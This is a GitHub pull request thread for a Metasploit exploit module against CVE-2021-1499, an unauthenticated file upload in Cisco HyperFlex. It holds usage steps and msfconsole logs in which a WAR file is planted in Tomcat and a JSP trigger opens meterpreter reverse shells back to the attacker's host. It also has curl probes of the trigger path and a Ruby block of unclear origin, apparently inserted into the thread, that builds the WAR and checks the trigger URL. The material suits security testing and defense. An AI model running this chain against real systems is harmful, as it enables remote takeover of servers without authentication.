
Cisco HyperFlex File Upload RCE #15333

Merged: 1 commit, Jun 17, 2021

Conversation


@jheysel-r7 jheysel-r7 commented Jun 11, 2021

Exploit module to leverage CVE-2021-1499: Unauthenticated file upload vulnerability in Cisco HyperFlex HX Data Platform.

Currently the module is set to use linux/x64/meterpreter_reverse_tcp by default. It uploads the war file to /var/lib/tomcat7/webapps/, the .war file gets auto deployed and then the module manually calls the .jsp file inside the deployed war file which sends a meterpreter session back to the user.

Potential Changes

It came to my attention during development that I'd likely be able to make use of a java/meterpreter payload. I'm going to continue investigating support for this.

Verification

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. Do use exploit/linux/http/cisco_hyperflex_file_upload_rce
  3. Set RHOSTS and LHOST
  4. Verify The target appears to be vulnerable (run the check method)
  5. Do run
  6. You should receive a shell. Depending on network speed and target specifications, you may need to adjust the Wait For Shell Delay (WfsDelay), as it takes a few seconds to upload, deploy and trigger the payload. WfsDelay is currently set to 5 seconds.

Demonstration

msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set rhosts 192.168.123.145
rhosts => 192.168.123.145
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set lport 4445
lport => 4445
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > options

Module options (exploit/linux/http/cisco_hyperflex_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.123.145  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Base path
   UPLOAD_FILE_NAME  BqGDbpfynLmRaaa  no        Choose a filename for the payload. (Default is random)
   VHOST                              no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT  4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Dropper


msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4445 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... calling: /crossdomain.xml/BqGDbpfynLmRaaa.jsp
[+] Payload executed successfully
[*] Meterpreter session 1 opened (192.168.123.1:4445 -> 192.168.123.145:52762) at 2021-06-14 17:19:35 -0400

meterpreter > getuid
Server username: tomcat7 @ HyperFlex-Installer-4.0.2d (uid=111, gid=114, euid=111, egid=114)
meterpreter > sysinfo
Computer     : HyperFlex-Installer-4.0.2d
OS           : Ubuntu 16.04 (Linux 4.4.0-75-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

@wvu wvu added the module label Jun 11, 2021
@jmartin-tech

@msjenkins-r7 test this please.

@jheysel-r7 jheysel-r7 marked this pull request as ready for review June 14, 2021 22:42
@wvu wvu added the docs label Jun 14, 2021
@smcintyre-r7 smcintyre-r7 left a comment


Just left a few comments. If this is ready, I can move on to testing it once they're addressed. Looks good overall, nice work @jheysel-r7 !

@smcintyre-r7 smcintyre-r7 self-assigned this Jun 15, 2021
jheysel-r7 commented Jun 15, 2021

@smcintyre-r7 Thanks for the review, much appreciated! Before wvu left for vacation they reminded me that we have native Java payloads. Wondering what your opinion is on switching from linux/x64/meterpreter_reverse_tcp to a native java payload?

** Edit: Or adding functionality to support both?

@wvu wvu left a comment


Congrats on another module! Overall good job. Bye.

end

def exploit
app_base = 'crossdomain.xml'
Contributor:

FWIW, there are more discreet options that work with a Java payload.

Contributor Author:

I assume I need to find a payload that returns a shell automatically when it deploys itself in the tomcat7/webapps/ directory? That would remove the need to name the war file crossdomain.xml.war

I named the directory crossdomain.xml due to the nginx configuration - if named anything else I don't think I'm able to execute what's inside as I get a 301.

Success when the directory is named crossdomain.xml:

➜  metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/crossdomain.xml/pngynhbplt.jsp
*   Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /crossdomain.xml/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:07:29 GMT
< Content-Type: text/html;charset=ISO-8859-1
< Content-Length: 6
< Connection: keep-alive
< Set-Cookie: JSESSIONID=9EDC41FB32DB4C8E66FDF87833703789; Path=/crossdomain.xml/; HttpOnly
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<






* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0

Unsuccessful when named something else:

➜  metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
*   Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /jsp_shell_reverse_tcp/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:06:17 GMT
< Content-Type: text/html
< Content-Length: 184
< Connection: keep-alive
< Location: https://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.8.1</center>
</body>
</html>
* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0

I've tried the following java payloads:

java/meterpreter/reverse_tcp
java/jsp_shell_reverse_tcp
java/shell_reverse_tcp

and am unable to get a shell without naming the directory crossdomain.xml .
I might be making an incorrect assumption with regard to how I need to execute the payload once uploaded.

Contributor:

There are other nginx locations that work. I was using a payload servlet. Maybe we can go over the different approaches when I come back. :)
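The two mechanics this thread turns on are the WAR drop (a ZIP archive that Tomcat expands from webapps/ and exposes under a directory named after the archive) and nginx's behaviour of serving /crossdomain.xml/ over plain HTTP while 301-redirecting other paths to HTTPS. The Ruby below is an added example, not code from the module or this PR: it builds a minimal WAR with only the standard library, derives the trigger path the module logs, and classifies HTTP responses reconstructed from the two curl transcripts above. The JSP body, web.xml, class and function names are stand-ins of mine; the response samples are constructed from the quoted headers.

```ruby
# Added example, not code from the module or this PR. Builds a minimal WAR
# with only Ruby's standard library, derives the trigger path the module logs,
# and classifies the two nginx responses quoted in the review thread.
require 'zlib'

# Minimal ZIP writer (stored entries, no compression). A WAR is a ZIP with
# WEB-INF/web.xml plus web resources; Tomcat autodeploys it from webapps/.
class WarBuilder
  def initialize
    @entries = [] # [name, data] pairs, both binary strings
  end

  def add(name, data)
    @entries << [name.b, data.b]
    self
  end

  def to_s
    out = String.new(encoding: Encoding::BINARY)
    central = String.new(encoding: Encoding::BINARY)
    @entries.each do |name, data|
      offset = out.bytesize
      crc = Zlib.crc32(data)
      # Local file header: sig, version, flags, method (0 = stored), time, date,
      # crc32, compressed size, uncompressed size, name length, extra length.
      out << [0x04034b50, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
              name.bytesize, 0].pack('VvvvvvVVVvv') << name << data
      # Central directory entry pointing back at the local header offset.
      central << [0x02014b50, 20, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
                  name.bytesize, 0, 0, 0, 0, 0, offset].pack('VvvvvvvVVVvvvvvVV') << name
    end
    cd_offset = out.bytesize
    out << central
    # End of central directory record.
    out << [0x06054b50, 0, 0, @entries.size, @entries.size, central.bytesize,
            cd_offset, 0].pack('VvvvvVVv')
  end
end

# Same layout the PR describes: the WAR carries one JSP named after
# UPLOAD_FILE_NAME. The JSP body and web.xml are harmless stand-ins (assumed).
def build_war(jsp_name, jsp_body = '<%= "ok" %>')
  web_xml = '<?xml version="1.0" encoding="UTF-8"?>' \
            '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1"/>'
  WarBuilder.new.add('WEB-INF/web.xml', web_xml).add("#{jsp_name}.jsp", jsp_body).to_s
end

# Reads entry names back from the central directory, as a ZIP reader would.
def war_entries(bytes)
  eocd = bytes.rindex("PK\x05\x06".b)
  _sig, _disk, _cd_disk, _n_disk, count, _cd_size, cd_offset, _clen =
    bytes[eocd, 22].unpack('VvvvvVVv')
  pos = cd_offset
  Array.new(count) do
    f = bytes[pos, 46].unpack('VvvvvvvVVVvvvvvVV')
    nlen, xlen, clen = f[10], f[11], f[12]
    name = bytes[pos + 46, nlen]
    pos += 46 + nlen + xlen + clen
    name
  end
end

# Trigger URL as printed by the module: /<app_base>/<UPLOAD_FILE_NAME>.jsp
def trigger_path(jsp_name, app_base = 'crossdomain.xml', target_uri = '/')
  "#{target_uri.chomp('/')}/#{app_base}/#{jsp_name}.jsp"
end

# Decide from an HTTP response head whether nginx served the JSP over plain
# HTTP (200, payload runs) or bounced the request to HTTPS (3xx + Location).
def classify_response(raw)
  head = raw.split(/\r?\n\r?\n/, 2).first
  status_line, *header_lines = head.lines.map(&:chomp)
  status = status_line[%r{\AHTTP/\d\.\d (\d{3})}, 1].to_i
  headers = header_lines.to_h { |l| k, v = l.split(':', 2); [k.strip.downcase, v.to_s.strip] }
  return :served if status == 200
  return :redirected_to_https if (300..399).cover?(status) && headers['location'].to_s.start_with?('https://')
  :other
end

# Constructed samples, reconstructed from the curl transcripts in the thread.
SERVED_RESPONSE = "HTTP/1.1 200 OK\r\nServer: nginx/1.8.1\r\n" \
                  "Content-Type: text/html;charset=ISO-8859-1\r\nContent-Length: 6\r\n\r\n\n\n\n\n\n\n"
REDIRECTED_RESPONSE = "HTTP/1.1 301 Moved Permanently\r\nServer: nginx/1.8.1\r\n" \
                      "Location: https://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp\r\n\r\n<html></html>"

if __FILE__ == $PROGRAM_NAME
  war = build_war('BqGDbpfynLmRaaa')
  puts "WAR: #{war.bytesize} bytes, entries #{war_entries(war).inspect}"
  puts "trigger: #{trigger_path('BqGDbpfynLmRaaa')}"
  puts "crossdomain.xml path: #{classify_response(SERVED_RESPONSE)}"
  puts "other path: #{classify_response(REDIRECTED_RESPONSE)}"
end
```

The writer uses stored (uncompressed) entries on purpose: Tomcat accepts them, and it keeps the archive format readable in a hex dump when debugging a failed deploy. The classifier is the check a module author would want before wiring up a payload under a different app base: a 3xx with an https:// Location means the JSP was never reached, which is exactly the failure the second curl transcript shows.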

Comment on lines +138 to +137
register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml.war')
register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/')
Contributor:

If a way to change the name, as discussed here, is found, this will need to account for it.

Contributor Author:

After thorough testing I haven't been able to find a way to change the name of the file while still being able to execute it. I think these will stay as is.

Contributor:

FYI, these paths are incorrect, and register_dir_for_cleanup is preferred.

beta draft

RCE working with linux/x64/meterpreter_reverse_tcp

rubocop

Updated title, removed newlines

Responded to comments

Rubocop offenses

Update documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Responded to comments

Rubocop offenses

Added support for Java Dropper

Made changes to Linux Dropper

Rubocop

Improved check method, changed to default staged payload, removed TODO

Switched to single-quoted strings
@smcintyre-r7

Just tested this one last time and confirmed it's working as intended. I tested both targets and the Linux dropper with both a staged and unstaged payload. Both did work, but the unstaged payload does seem slightly more reliable. Since that's the default value, it seems fine.

msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > show options 

Module options (exploit/linux/http/cisco_hyperflex_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.159.250  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Base path
   UPLOAD_FILE_NAME  DUCZwPtoIjHhLt   no        Choose a filename for the payload. (Default is random)
   VHOST                              no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set PAYLOAD linux/x64/meterpreter_reverse_tcp 
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... calling: /crossdomain.xml/DUCZwPtoIjHhLt.jsp
[+] Payload executed successfully
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.250:44834) at 2021-06-17 13:38:37 -0400
[!] This exploit may require manual cleanup of '/var/lib/tomcat7/crossdomain.xml.war' on the target
[!] This exploit may require manual cleanup of '/var/lib/tomcat7/crossdomain.xml/' on the target

meterpreter > getuid
Server username: tomcat7 @ HyperFlex-Installer-4.0.2d (uid=111, gid=114, euid=111, egid=114)
meterpreter > sysinfo
Computer     : HyperFlex-Installer-4.0.2d
OS           : Ubuntu 16.04 (Linux 4.4.0-75-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

I'll have this landed in a moment, thanks @jheysel-r7 !

@smcintyre-r7 smcintyre-r7 merged commit 397c9ef into rapid7:master Jun 17, 2021
@smcintyre-r7

Release Notes

This adds an exploit module targeting a file upload vulnerability within the Cisco Hyperflex application that can be used to obtain unauthenticated remote code execution.

@smcintyre-r7 smcintyre-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 17, 2021
@jheysel-r7 jheysel-r7 deleted the hyperflex_file_upload_rce branch June 17, 2021 17:42
wvu commented Jun 18, 2021

Excellent effort on this, @jheysel-r7. :)
